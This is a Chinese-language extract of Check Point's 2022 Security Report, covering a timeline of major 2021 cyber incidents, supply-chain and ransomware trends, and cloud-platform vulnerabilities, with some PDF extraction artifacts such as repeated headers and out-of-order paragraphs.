报告 | 网络安全 2022

报告 | 网络安全 2022

该报告分析了2022年网络安全领域的主要趋势和新兴威胁,包括勒索软件和供应链攻击的上升。它还提供了提升企业安全防御的建议,以帮助组织更好地应对复杂的网络威胁。

报告 | 网络安全 2022

2CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

YOU DESERVE THE BEST SECURITY

3CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第 第 1 1 章:章:CHECK POINT 2022 年安全报告引言

8 第第 2 2 章:章:2021 年重大网络事件时间表

13 第第 3 3 章:章:2021 年网络安全趋势 13 从 SolarWinds 到 Log4j

17 网络攻击的后果

21 云服务受到攻击

25 移动终端领域新动态

28 勒索软件生态系统的破绽

32 第第 4 4 章:章:恶意软件聚焦:EMOTET 卷土重来

35 第第 5 5 章:章:全球统计信息 41 全球恶意软件统计信息

43 主要恶意软件全局分析

45 僵尸网络全局分析

47 信息窃取恶意软件全局分析

49 加密货币挖掘软件全局分析

51 银行木马病毒全局分析

53 移动终端恶意软件全局分析

目录

05 07 12

31 34

4CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 6 6 章:章:引人注目的全球性漏洞 55 “Log4Shell”Apache Log4j - 远程代码执行 (CVE-2021-44228)

56 “ProxyLogon”Microsoft Exchange 服务器 - 身份验证绕过 (CVE-2021-26855)

56 Atlassian Confluence - 远程代码执行 (CVE-2021-26084)

60 第第 7 7 章:章:防御下一次网络疫情 - 实现更高安全性的策略 60 威胁防护 - 预先防御,规避攻击

60 网络边界无处不在,攻击范围不断扩大,企业需要基于实时威胁情报 做好精准防御

61 防护需要面面俱到,因为所有环节都可能成为攻击目标

61 利用完备的统一架构

62 维持网络安全洁净度

64 结语

附录:恶意软件系列说明

54

59

65

5CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 5CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

01 第第 1 1 章章

CHECK POINT 2022 年安全报告引言引言

01

过去 12 个月是近年来最动荡、最混乱的时期之一,至少在安全 领域情况如此。

6CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 6CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

MAYA HOROWITZ Check Point 威胁研究副总裁

过去 12 个月是近年来最动荡、最混乱的时期之一,至少在安全领域情况如此。疫情阴霾持

续笼罩,拨云见日仍未有时,全球政府和企业还在艰难前行,构建所谓“新常态”任重道

远。随着企业采用混合和远程办公模式,数字化转型进程显著加快,然而 2020 年困扰许多

企业的有关安全成熟度的问题在 2021 年同样存在。其中一些问题依然悬而未决,但威胁执

行者已经不失时机地将形势扭转为对自己有利的局面。自我们发布上一份年度报告以来,网

络攻击平均增加了 50%,其中教育和研究领域受害尤甚,全年平均每周发生 1,605 次攻击。

正如预测的那样,身背恶名的 SolarWinds 漏洞似乎引发了一波供应链攻击潮,并且持续一

整年都毫无放缓迹象。

在这份 2022 年安全报告中,我们将揭示 Check Point Software 研究人员在过去一年中观察

到的重点攻击向量及相关技术,包括新一代高度复杂的供应链攻击方法,以及造成数十万企

业面临潜在数据泄露的 Log4j 漏洞利用。

我们首先将逐月历数本年度主要网络事件,然后深度解析将影响来年走向的一些新兴趋势。

之后我们将讨论云服务、移动领域和物联网的新动态、勒索软件生态系统的破绽、Emotet 的

回归,当然还有为乱象频仍的一年火上浇油的 Log4j 零日漏洞。

第第 1 1 章章

7CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 7CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 2 2 章章

02 2021 年重大网络事件 时间表时间表

2021 年,异常高发的网络攻击事件扰乱了人们的日常生活,某些情况下 甚至让人们感觉危及自身安全。

8CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

1 1 月月,美国司法部证实,受 Solarwinds 供应链攻击影响,其 3% 的员工邮箱遭到非法访问,目的 是窃取敏感数据。该部门共有超过 100,000 名员工,分别供职于包括联邦调查局 (FBI)、缉毒署 和美国法警署在内的多个执法机构。司法部此前购置安装了 SolarWinds Orion 平台,黑客在执行 此次攻击时利用的即是该工具,导致多达 18,000 名 SolarWinds 客户遭遇入侵。司法部表示他们 是在平安夜获悉自己不幸中招,并透露其 Microsoft Office 365 电子邮件帐户已有一小部分遭到盗 用。

2 2 月月,在发生类似事件后仅过了三个月,流行音乐流媒体平台 Spotify 便遭遇了凭据填充(撞 库)攻击。这次攻击使用了从 100,000 个用户帐户中窃取的凭据,并利用了遭到恶意软件攻击的 Spotify 登录数据库。Spotify 在接到攻击报告后立即向用户发出消息,提示他们重置密码以使被盗 凭据无效。该公司在声明中表示,他们还设法让其互联网服务提供商删除欺诈性数据库,并指出

此次攻击与 Spotify 自身的安全漏洞无关。实施撞库的网络犯罪分子针对的是在多个网络帐户和平 台上重复使用相同密码的用户。攻击者只需构建自动化脚本,便可系统性地尝试针对各种类型的

帐户窃取 ID 和密码。

2021 年 3 3 月月 2 日,Volexity 报告了 Microsoft Exchange Server 漏洞 CVE-2021-26855、CVE- 2021-26857、CVE-2021-26858 及 CVE-2021-27065 遭到广泛利用。进一步调查发现,攻击者利 用的是被广泛使用的零日漏洞。攻击者利用该漏洞窃取了多个用户邮箱的全部内容。该漏洞可以

远程利用,不需要经过身份验证、具备特殊知识或访问特定环境。据估计,共有 250,000 台服务 器成为这些攻击的受害者,其中包括美国约 30,000 个组织的服务器和英国的 7,000 台服务器。欧 洲银行管理局、挪威议会和智利金融市场委员会 (CMF) 亦受波及。

01 JAN

03 MAR

02 FEB

9CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

4 4 月月,美国国家安全局 (NSA)、网络安全和基础设施安全局 (CISA) 以及联邦调查局 (FBI) 发布 联合公告警告称,与俄罗斯关联的 APT 组织 APT29 正在利用五个漏洞以美国为目标进行持续攻 击。根据该公告,俄罗斯对外情报局 (SVR) 的威胁执行者(也称为 APT29、Cozy Bear 和 The Dukes)经常使用公开已知漏洞对易受攻击的系统进行广泛的扫描和利用,目的是获取身份验证凭 据以执行进一步访问。俄罗斯 SVR 最近的活动包括破坏 SolarWinds Orion 软件更新,通过部署 WellMess 恶意软件将 COVID-19 研究设施作为攻击目标,以及利用当时还是零日漏洞的 VMware 漏洞。

5 5 月月,由于遭受勒索软件攻击,Colonial Pipeline 的日常运营陷入停滞。这家公司承担着美国东 海岸 45% 的燃油供应,包括柴油、汽油和航空燃料。据称,俄罗斯 DarkSide 勒索软件犯罪集团 是此次攻击的幕后黑手。Colonial Pipeline 运营着美国最大的成品油运输管道,全长 5,500 英里 (8,851 公里),每天从德克萨斯州休斯顿市向纽约港输送超过 1 亿加仑的石油。DarkSide 使用 勒索软件即服务 (RaaS) 模型,依靠联盟计划来执行网络攻击。Colonial Pipeline 支付了近 500 万 美元的赎金用于换取解密密钥。后来,FBI 宣布已取回赎金账户的私钥,并收回了支付的 63.7 个 比特币。

美国肉类加工巨头 JBS 在 6 6 月月遭到勒索软件攻击,其北美和澳大利亚的业务因此受到影响。FBI 将此次攻击归咎于 REvil 勒索软件组织。这次攻击迫使 JBS 暂时关闭了其在美国的所有牛肉工厂。 他们设在加拿大的一家工厂也受到影响,在工厂恢复生产之前,公司暂停了在澳大利亚的牛羊屠

宰作业。6 月 9 日,JBS 美国首席执行官透露,公司已向黑客支付 1,100 万美元,这是“非常痛 苦但必须做出的决定”,尽管公司能够通过自己的备份恢复其大部分系统。

04 APR

06 JUN

05 MAY

10CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

7 7 月月,REvil 勒索软件组织针对多家托管服务提供商 (MSP) 及其客户发起了供应链攻击。威胁执行 者成功地向 IT 公司 Kaseya 的 VSA 补丁管理和客户端监控工具植入恶意软件更新,其中包括恶意 软件安装程序。据估计,有 1,000 家公司受到此次攻击的影响。REvil 在 7 月 4 日当周周末实施大 规模供应链攻击,索要数百万美元赎金,影响了众多 Kaseya 客户。Kaseya 在其网站上发布了一 则安全公告,警告所有客户在调查期间立即关闭他们的 VSA 服务器,以防止攻击蔓延。为攻破本 地 Kaseya VSA 服务器,REvil 使用了正在修复的零日漏洞。荷兰漏洞披露研究所 (DIVD) 的安全 研究人员此前已向 Kaseya 披露该漏洞,Kaseya 当时正在进行向客户发布补丁之前的验证工作。 然而,REvil 勒索软件团伙比 Kaseya 抢先一步,利用该漏洞实施了攻击,索要的赎金从 4.5 万美 元到 500 万美元不等。在对 Kaseya VSA 服务器进行攻击时,REvil 联盟最初将 Kaseya 的 MSSP 作为目标,其明确意图是向 MSSP 客户进行传播。从 MSSP 到实际客户,攻击影响呈指数级增 长。

据检测,8 8 月月发生了有史以来最大规模的分布式拒绝服务 (DDoS) 攻击,峰值高达每秒 1,720 万次 请求。这次攻击由 Mirai 僵尸网络发起,目标是金融行业的某家企业。在这次特定事件中,流量来 自全球 125 个国家/地区的 20,000 多个僵尸程序,其中近 15% 的攻击来自印度尼西亚,其次是印 度、巴西、越南和乌克兰。Mirai 被发现于 2016 年首次瞄准物联网 (IoT) 设备,例如闭路电视摄 像头和路由器。此后该僵尸网络出现诸多变种,目标设备列表也扩大到包括 Linux 路由器和服务 器、Android 设备等等。

Check Point Research 发现,在美国总统拜登颁布疫苗强制令后,Telegram 上伪造 COVID-19 疫 苗接种证明的黑市交易在全球范围内激增。黑市已扩大到服务于 28 个国家/地区,包括奥地利、阿 联酋、巴西、英国、新加坡等。在全球范围内,伪造疫苗接种证明的价格也大幅上涨,包括在美

国,从 100 美元翻倍至 200 美元。

09 SEP

08 AUG

07 JUL

11CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

10 10 月月,俄罗斯 REvil 勒索软件团伙(多起勒索软件攻击的主谋)的基础设施受到重创,在三个月 内第二次被强制关闭,该团伙由此停止活动。在此之前,REvil 的泄密网站“Happy Blog”曾在 7 月关停(与此同时 REvil 团伙头目“UNKN”可疑失踪),后又在 9 月死灰复燃,由团伙余党重新 启用。REvil 勒索软件在 2021 年因一系列毁灭性攻击而恶名远播,在他们从肉企巨头 JBS 手中成 功勒索得到 1,100 万美元赎金并于 7 月入侵美国软件管理公司 Kaseya 之后气焰尤盛。这些破坏性 攻击愈演愈烈,也促使政府向 REvil 进一步施压,并对其基础设施及成员展开执法行动。

11 11 月月 14 14 日日,史上最臭名昭著的僵尸网络之一 Emotet 在由国际联合执法行动摧毁十个月之后死而 复生。Emotet 使用 Trickbot 僵尸网络来启动操作,机器会在感染 Trickbot 木马病毒后开始下载并 执行最新版本的 Emotet。复活之后的 Emotet 较先前更强大,在工具箱中增加了一些新功能,比 如更新的加密方案、控制流混淆技术和新的传播方式。

12 12 月月 9 日,Apache 日志包 Log4j 2 版本 2.14.1 及更低版本被爆出存在严重的远程代码执行 (RCE) 漏洞 (CVE-2021-44228)。Apache Log4j 是最受欢迎的 java 日志库,其 GitHub 项目的下 载量超过 400,000 次。该库由全球各地大量公司广泛使用,支持登录各种流行的应用程序。利用 该漏洞轻而易举。Log4j 库已嵌入到我们所熟悉的几乎所有互联网服务或应用程序中,包括 Twitt er、Amazon、Microsoft、Minecraft 等。攻击爆发后,Check Point Research 目睹了进化压制效 应,原始漏洞快速发生变异,在不到 24 小时内涌现出超过 60 个变种。这显然是近年来互联网上 最为严重的漏洞之一。

10 OCT

12 DEC

11 NOV

12CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

第第 3 3 章章

2021 2021 年年 网络安全趋势

03

整个 2021 年,软件供应链攻击的频率和规模都在持续增长。研究人员总结 认为,软件供应链攻击同比增幅不低于 650%。

13CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

从 SOLARWINDS 到 LOG4J 恶名昭彰的 SolarWinds 供应链攻击于 2020 年 12 月披露,因其在云攻击领域的影响(特别是在供应链

攻击方面的影响)而再次列入我们的报告。SolarWinds 事件起源于复杂的恶意软件 Sunburst,该软件被

整合到名为 SolarWinds Orion 的 IT 资源管理产品的多个受损版本中,在全球有 33,000 名客户使用。该

恶意更新被认为系俄罗斯情报机构下属威胁组织“Nobelium”所为,已有约 18,000 家企业遭殃,财富

500 强榜单上的约 425 家公司受到感染,包括国土安全部和财政部在内的美国政府部门也未能幸免。

LOTEM FINKELSTEEN 威胁情报与研究主任

第第 3 3 章章

SolarWinds 攻击是对安全领域具有阶段性意义的时刻,不仅 仅因为攻击规模庞大,更是由于所用技术展现了复杂性能够

达到的最新水平,因而更为普遍地增加了供应链攻击的威胁。

SolarWinds 泄露事件设立了新基调,正如预测那样,我们看 到软件供应链攻击事件随之增加。过去一年中,此类事件数

量增加了六倍,而且再次有迹象表明,企业尚未做好应对威

胁的准备。”

14CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 14CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

知名 APT 组织显然与这一趋势密不可分。朝鲜

Lazarus 组织最近开始针对 IT 服务提供商发起供应

链攻击,名为 BLINDINGCAN 的新后门程序已用于

攻击拉脱维亚某 IT 供应商和韩国某软件公司。其它

事件包括由 DarkSide 勒索软件团伙成员对一家闭路

电视供应商实施攻击,攻击者入侵了该供应商的网

站,利用勒索软件感染其客户。

2021 年最值得注意的供应链攻击之一同样传播勒索

软件,目标锁定为向托管服务提供商 (MSP) 和 IT 团

队提供 IT 管理软件的全球提供商 Kaseya。该攻击由

REvil 勒索软件组织联盟计划成员实施。据 Kaseya

首席执行官称,只有不到 0.1% 的公司客户受到牵

涉,但由于 Kaseya 的一些客户本身就是 MSP,因

此有多达 1,500 家公司受到攻击影响。威胁执行者狡

猾地利用了影响 Kaseya 面向互联网的 VSA 服务器

的漏洞。VSA 是 MSP 常用的远程监控工具,用于管

理网络和终端设备。在发现攻击后,Kaseya 已敦促

其客户关闭他们的 VSA 服务器。

正如我们在先前的报告中详述的那样,除了规模前所

未有,SolarWinds 的主要创新在于其技术。为了访

问组织的敏感 Microsoft 365 资源,攻击者首先使用

伪造的令牌来破坏本地和内部网络,然后再横向移动

到云环境。现在我们可以明确指出,SolarWinds 攻

击为供应链攻击快速激增奠定了基础。

整个 2021 年,软件供应链攻击的频率和规模都在持

续增长。研究人员总结认为,软件供应链攻击同比增

幅不低于 650%。欧盟网络安全局 (ENISA) 发布的一

项研究回顾了二十余起攻击事件,发现有 66% 的供

应链攻击是利用未知漏洞实施,而只有 16% 利用了

已知的软件缺陷。大部分攻击实际上针对的是软件代

码。今年,许多企业依然被网络攻击打得措手不及,

重蹈覆辙的原因也如一项调查推断的那样,有 82%

的公司为其软件供应链中的第三方供应商角色分配了

过高的权限。76% 的公司提供的是允许帐户接管的

角色,更有甚者,超过 90% 的指定安全团队居然并

未意识到他们已授予此类权限。

第第 3 3 章章

15CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 15CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

今年,SolarWinds 攻击的幕后组织恢复活动,利用

了针对首次攻击制定的方案,再次将火力集中到身

处全球 IT 供应链当中的企业。不过,这波攻击对准

的是供应链的另一部分,即云经销商和技术服务提

供商。这些公司为其客户定制、实施和管理云服务。

威胁组织显然想依靠这些公司直接访问其客户环境,

以便在一次打击中获得对其完整客户列表的访问权

限,从而伪装成可信的合作伙伴。该行动自 2021 年

5 月开始实施,影响到 140 多家经销商和供应商,

其中 14 家已城池失守。整个下半年,“Nobelium”

威胁组织一直非常活跃,但由于企业防范意识增

强,其攻击成功率较低。该组织运用多种策略,包

括使用第三方攻击者通过信息窃取活动所窃得的凭

据,利用应用程序模拟权限来收集受保护的邮件数

据,以及滥用多因素身份验证 (MFA)。最近的攻击

浪潮可能表明,这家由俄罗斯政府支持的组织在供应

链运营领域投入的资源有所增加,以此作为持续接

触俄政府关注目标的手段。

10 月下旬,每周下载量达数百万次的热门 NPM 包

“ua-parser-js”遭到攻击者入侵。在四个小时的时

间内,攻击者成功接管了开发者的 NPM 帐户,并将

恶意代码插入到三个版本的 NPM 库中。该库可用来

解析用户代理字符串并识别其浏览器、操作系统、

CPU 等,被用在数千个项目中,包括 Facebook、

Microsoft、Amazon、Google 和 Slack 创建的项目。

因此,在该供应链攻击中分发的是库中的受损软件包

而非合法包,使威胁执行者能够在大量受感染设备上

安装恶意软件。该案例中的 Linux 和 Windows 设备

即由加密货币挖掘软件和密码窃取程序感染。

另一起重点事件发生在 11 月,当时多家希腊航运公

司遭到勒索软件攻击。这些公司都与 IT 服务提供商

Danaos Management Consultants 合作,该提供商

在此前一次供应链攻击中被攻破。事件造成这些航运

公司的通信渠道严重受阻,切断了他们与其它船只、

供应商和代理商的联系,并导致数据丢失。

第第 3 3 章章

16CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 16CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

最严重的漏洞,造成破坏的全部范围尚有待确定。

Apache 基金会发布了针对 RCE 漏洞的补丁,尽管

如此,已有多家安全供应商观察到大量针对易受攻击

服务器的扫描活动。Log4j 漏洞的利用率在曝光后不

久便高得不同寻常。Check Point Research 在 Log4j

漏洞披露 2 小时后检测到大约 40,000 次攻击尝试,

事件发生 72 小时后检测到 830,000 次攻击尝试。

该漏洞可能会允许威胁执行者访问任何使用该库的系

统,包括用于管理客户端网络和资源的系统。开源库

中的这一漏洞可能造成的潜在损害表明,软件供应链

会带来巨大风险。想想仅由几个兼职志愿者运行的资

金不足的项目,竟成为全球不计其数的计算机系统所

依赖的重要组件,这种风险尤为触目惊心。

就在我们以为已完成对 2021 年供应链现状的总结

时,爆出了 Log4j 零日漏洞。Apache 日志包 Log4j

是最受欢迎的 Java 日志库,每日下载量超过 400,000

次,已整合至全球数百万基于 Java 的应用程序。使

用 Log4j 作为日志包的公司包括 Cisco、Twitter、

Cloudflare、Tesla、Amazon、Apple 等。Log4j 日

志包会记录错误消息,根据 Apache 基金会的公告,

在启用消息查找替换时,攻击者若能控制日志消息或

其参数,便可通过多种协议从外部服务器执行任意代

码,只需一段文本字符串即可利用该漏洞。

自 12 月 9 日发现以来,“Log4Shell”漏洞已被大

规模广泛利用。该漏洞编号为 CVE-2021-44228,可

能允许未经身份验证的攻击者执行恶意代码,或接管

任何使用易受攻击版本开源库的系统。不出所料,它

在最高分为 10 分的 CVSS 评分系统中获评 10 分。

鉴于该库的分布规模,Log4Shell 被认为是 2021 年

第第 3 3 章章

17CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 17CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

OMER DEMBINSKY 数据研究团队经理

网络攻击的后果 众所周知,网络攻击无论是重点聚集还是多点散发,都会对企业的绩效、数据完整性、客户成功、长期

声誉,当然还有财务方面产生巨大影响。显而易见,针对关键基础设施的攻击会使企业日常运作乃至整

个供应链陷入瘫痪。2021 年,异常高发的网络攻击事件扰乱了人们的日常生活,某些情况下甚至让人们

感觉危及自身安全。无论是出于经济层面还是意识形态层面的驱动因素,威胁执行者都在不断寻求通过

更多手段和新方法来对受害者施加更大的压力。

第第 3 3 章章

正如我们在年中报告中所述,随着威胁执行者利用不断变化 的环境以及仓促推进的数字化转型,网络攻击事件正在全面

增加。截至本报告发布之日,与上年数据相比,网络攻击平

均增加了 50%,而教育和研究部门承受的火力似乎最为猛 烈,平均每周发生 1,605 次攻击。”

18CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 18CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

闭,迫使公司 7,000 名员工强制休假。最终,由于

担心价格上涨和大规模失业,JBS S.A. 子公司 JBS

USA 的首席执行官宣布,该公司已向网络犯罪分子

支付了约合 1,100 万美元的比特币赎金。

教育部门也受到严重影响。该行业在 2021 年面对的

炮火最为密集,与 2020 年相比攻击增加 75%,每个

组织平均每周尝试近 1,605 次攻击。教育机构遭受

的破坏对学生和教职员工都造成了影响。美国华盛顿

哥伦比亚特区霍华德大学在 9 月不幸遭遭到勒索软

件攻击,他们被迫停课以对网络进行彻底调查,并对

学生和教员设备进行审计。无独有偶,伊利诺伊州的

刘易斯和克拉克社区学院也在 11 月遭受勒索软件攻

击,影响了他们的在线学习平台及其它关键系统。他

们只得关闭全部校园,同时取消课外活动,包括由学

院承办的体育赛事。FBI 已就针对美国和英国高等教

育机构的 PYSA 勒索软件发布了警报。

本年度最为重大的攻击之一可以有力佐证这一观点,

该勒索软件攻击事件发生在 5 月,行动瞄准的是向美

国东南海岸供应燃油的油企 Colonial Pipeline。攻击

事件迫使该公司关闭其业务,推高了汽油价格,并导

致东海岸发生严重的供应短缺。一连串事件最终引发

恐慌性抢购,因为许多加油站一度无油可供。政府官

员呼吁公众不要急着涌向加油站,而人们事实上已经

开始用塑料袋囤油以应对汽油荒。攻击发生一天过后,

Colonial Pipeline 不得不向发起攻击的 DarkSide 勒

索软件团伙支付 500 万美元赎金,以求解锁他们的

系统。

同月,全球最大肉类加工公司 JBS S.A 不幸遭遇

REvil 勒索软件组织的攻击。这家巴西公司通过设在

15 个国家/地区的 150 家工厂供应肉类产品,在全球

拥有约 150,000 名员工。针对该公司网络的攻击影

响了美国、加拿大和澳大利亚的屠宰作业和肉类供

应,并导致 3,000 多名工人取消工作班次。白宫指

派 FBI 前往展开调查,该公司设在美国的所有牛肉

工厂和肉类包装设施(占到美国肉类供应量的近四分

之一)均暂时停产。在澳大利亚,部分屠宰场完全关

第第 3 3 章章

19CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 19CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

不可办理。去年 12 月,在全美拥有 80 多家阿片类

药物治疗诊所的 Behavioral Health Group (BHG) 突

遭网络攻击,致使其网络中断一周。在部分治疗中

心,由于电脑不能打印处方标签,导致居家治疗患

者无法获得用于治疗麻醉成瘾的药物剂量,这可能

会对他们容易波动的抗成瘾治疗造成不利影响。

受意识形态驱使的黑客也设法制造公众混乱,这一

问题在伊朗尤其突出。先是在 7 月,伊朗铁路基础

设施遭到网络攻击,黑客们在全国各地车站的公告

板上发布火车延误或取消的虚假消息,怂恿乘客拨

打伊朗最高领袖 Ayatollah Khamenei 办公室的电话

号码获取更多信息。当天的攻击严重扰乱了列车运

行,并引发公众恐慌和混乱。Check Point Research

进行调查后认为,此次攻击系反政府组织 Indra 所

为,该组织至少自 2019 年以来一直频有动作,以使

用数据擦除工具恶意软件而闻名。

我们最后要提到的是在 2021 年年中,Grief 勒索软

件攻击了美国多个学区,密西西比州的一个学区位列

其中。该勒索软件窃取了包括个人和专业信息在内的

10GB 数据,并威胁称除非支付赎金,否则将公布这

些数据。大学和学院这样的高等院校成为网络犯罪分

子的理想目标,是因为他们的系统允许学生和教职员

工将个人设备连接到机构网络,但并未采取足够的保

护措施。

自疫情开始以来,医疗保健行业也成为网络犯罪分子

紧盯的目标,由于医院、疫苗研发参与机构和制药公

司时间紧迫,不法分子便借机趁火打劫。10 月,加

拿大纽芬兰-拉布拉多省的医疗保健系统遭到毁灭性

勒索软件攻击。攻击造成严重后果,员工和患者数据

被盗,关键系统停止运行一周有余,导致包括化疗在

内的数千次预约发生延误,因为该省几乎所有非紧急

服务和医疗程序都被迫取消。同月,中东地区一家医

院成为最早遭受勒索软件攻击的医疗机构之一。攻击

使计算机和院内部分基础设施丧失机能,由于无法检

索患者档案和注册新档案,患者出院和医疗手续均

第第 3 3 章章

20CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 20CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

10 月,大规模网络攻击席卷 4,300 座伊朗加油站,攻击

目标是用于通过政府补贴购买燃油的电子卡系统。准

备加油的消费者在电子显示屏上看到了“网络攻击

64411”字样的通知,该号码是伊朗最高领袖的电话

号码(与火车站攻击事件中曝光的号码相同)。事件

引发巨大混乱,人们在加油站前排起长龙,担心汽油

短缺以及油价突然上涨。

上述所有攻击都对特定目标领域和地区产生重大影

响。攻击也引起大量媒体关注,自然正中网络犯罪分

子下怀,他们要的就是制造恐惧并妄图震慑受害者。

而遗憾的是,2021 年的这些攻击也已证明,网络攻

击对于普通人群的影响往往比攻击者最初预期要广泛

得多。

第第 3 3 章章

21CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 21CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

ITAI GREENBERG 产品管理副总裁

云服务受到攻击

2020 年,全球疫情为企业工作环境和企业网络架构带来重大变化。这些变化主要体现在两个方面,

一是转向基于云的架构,旨在满足对混合远程管理网络的需求;二是就实际采用规模而言,相比传

统供应商,企业更倾向于选择“即服务型”提供商。到了 2021 年,这一趋势愈加明显,云环境在

终端用户中也益发受到欢迎。根据年中由 Gartner 发布的预测,2021 年终端用户对于公有云服务

的支出预计将增长 23%,达到 3,320 亿美元以上,而 2020 年和 2019 年这一数字分别为 2,700 亿

美元和 2,427 亿美元。企业现正向多云架构投入大量资金,其中 Microsoft Azure 和 AWS 是最受

欢迎的两种架构,Google Cloud Platform、IBM、VMWare 等也占据了可观的市场份额。

第第 3 3 章章

企业对云计算的依赖与日俱增,这已成为顺理成章的趋势,特 别是在构建后疫情时代的“新常态”之际,混合办公模式将在

多个行业发挥关键作用。而将生产力转移到云端,也意味着企

业日益依赖供应商来管理他们的数据库、专有代码和组织资

源,其中存在诸多内部知识空白,有待他们努力填补。查缺补

漏应当是企业在 2022 年的首要目标,将帮助他们在安全、合 规和风险方面充分利用与云供应商的关系。”

22CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 22CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

企业显然日益依赖云供应商来安全地管理他们的数

据库、专有代码和企业资源。他们目前正逐步填补

在 2020 年快速转向云环境期间留下的平台和角色管

理知识空白,以期实现更好的安全性和更全面的管

理。而在此期间,IAM(身份和访问管理)角色假设

攻击仍然是值得关注的问题,这类攻击旨在经由获

得未授权访问权限来进一步提升权限。

像往常一样,威胁执行者继续与安全研究社区斗智

斗勇,寻找新漏洞和恶意利用途径。自 2021 年底以

来,我们目睹了一波利用行业领先云服务提供商的

服务缺陷进行攻击的浪潮,这些攻击试图控制企业

的云基础设施,或者可能控制企业用于存储专有、

客户和财务信息的整个数据库。本报告讨论的缺陷

并非信任逻辑缺陷,这种基于许可的缺陷源自企业的

角色策略,威胁执行者利用这些缺陷在其环境中逐

步进行权限升级。相反地,我们探讨的是云基础设

施自身的严重漏洞,这些漏洞可能允许完全接管帐

户或执行任意代码。

这一趋势源自恶名远播的 OMIGOD 漏洞攻击。9 月,

研究人员在 OMI(开放管理基础设施)中发现了四个

严重漏洞。OMI 是 Microsoft Azure 的软件代理之

一,允许用户跨远程和本地环境管理配置。OMI 部署

在嵌入多项 Azure 服务的 Azure Linux 虚拟机上,并

在启用某些服务时自动部署,导致这些缺陷极有可

能被利用。据估计,易受攻击的 Azure 客户占到 65%

的比例,相当于成千上万的企业和数百万台终端设

备。想要利用 OMIGOD 漏洞简直易如反掌,只需提

出删除身份验证标头的请求即可。这些漏洞可以使

执行者能在易受攻击的网络中远程执行任意代码,

并升级至 Root 权限。

Microsoft 已在 2021 年 9 月的版本发布中提供补丁

用于解决这些漏洞。但一些研究人员警告称,该公

司的自动修补程序在前几天内毫无作用,之后才得

到修复。在漏洞曝光之前已经观察到利用这些漏洞

的攻击,特别是评分达到 9.8 的 RCE 漏洞(编号为

CVE-2021-38647),此后更是攻击量猛增。仅第一

第第 3 3 章章

23CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 23CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

恶意用户可能会在其它客户端的 Kubernetes 群集上

运行任意代码。该漏洞的利用分为三个阶段,首先

是容器逃逸,这是一种针对容器环境的权限升级技

术。Azurescape 使攻击者能够获得对整个容器群集

的管理权限。值得庆幸的是,相关补丁在漏洞首次曝

光后立即发布,不过 ACI 用户仍需采取进一步行动。

截至 2021 年底,未再发现漏洞利用情况。不过,这

一缺陷已让人们认识到多租户云环境(即通过单一

平台托管多个组织的常见大型基础设施)所带来的危

险。

Microsoft Azure 并非去年被发现存在安全漏洞的唯一

服务。6 月,研究人员发现 Google 计算引擎 (GCE)

中存在漏洞。该计算引擎是 Google 云平台的基础设

施即服务 (IaaS) 组件,用于按需创建和启动虚拟机。

漏洞使攻击者能够通过多种因素接管虚拟机,比如由

ISC DHCP 软件使用弱随机数。通过从目标虚拟机的

角度模拟元数据服务器,可以利用该漏洞,让执行者

最终以虚拟机 Root 用户的身份登录。Google 在首次

披露该漏洞近一年后才发布了针对该漏洞的补丁。

个周末,扫描易受攻击设备的服务器就从 10 台左右

飙升至逾 100 台。臭名昭著的 Mirai IoT(物联网)

僵尸网络是最早针对易受攻击设备的僵尸网络之一,

该恶意软件试图关闭端口 5896(OMI SSL 端口)以

阻止其他攻击者利用该攻击。此外,还观察到旨在将

加密货币挖掘软件部署到未打补丁 Linux 设备上的攻

击。

Microsoft Azure 中另一项值得警惕的缺陷早在一个

月之前的 8 月便已曝光,此次被称为“ChaosDB”

的漏洞在 Azure Cosmos DB 中发现,该多模型

NoSQL 数据库由可口可乐、Skype 和 Symantec 等

全球巨头用于管理包括金融交易信息在内的大型数据

库。该漏洞使攻击者能够检索用于获取 Root 权限的

多个内部密钥,最终使其能够管理企业的数据库和帐

户。简单说来,通过利用这一漏洞,攻击者可以完全

不受限制地控制所有 Azure Cosmos DB 客户端的全

部云资源。

Microsoft Azure 在临近年底之际又爆出另一个漏洞,

称为“Azurescape”,会影响 Azure 的容器即服务

(CaaS) 平台,并依赖于容器运行时 RunC 中已存在

两年的编号为 CVE-2019-5736 的漏洞。独特之处在

于 Azurescape 是跨帐户漏洞,允许攻击者打破入侵

环境局限,在同一公有云服务中属于其他用户的环

境中执行代码。这意味着 Azure 容器实例 (ACI) 的

第第 3 3 章章

24CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告 24CHECK POINT SOFTWARE | 2022 2022 年安全报告年安全报告

FPO

